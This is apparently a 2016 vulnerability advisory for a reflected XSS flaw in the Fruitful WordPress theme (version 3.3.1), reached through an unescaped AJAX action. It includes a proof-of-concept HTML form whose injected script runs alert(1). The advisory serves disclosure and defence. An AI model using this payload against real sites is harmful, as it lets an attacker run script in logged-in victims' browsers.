Fruitful [Reflected XSS]
Description
Theme Fruitful is vulnerable to Reflected XSS attack by using the
AJAX action fruitful_add_new_slide_action
. This action outputs the
contents of variable $_POST['data']
without proper escaping, thus
allowing to an attacker to form a malicious request and execute JS code
in the victims browser.
Because this action is a privileged one, it takes a registered and loged user to work.
PoC
Use a logged in user to submit this form
<form action="http://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="fruitful_add_new_slide_action">
<input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
<input type="submit" value="Click Me!">
</form>
INFO
- 3 June 2016
- Pan Vag
- github.com
- Fruitful
- 3.3.1
- WordPress 4.5.2
- DWF-2016-87054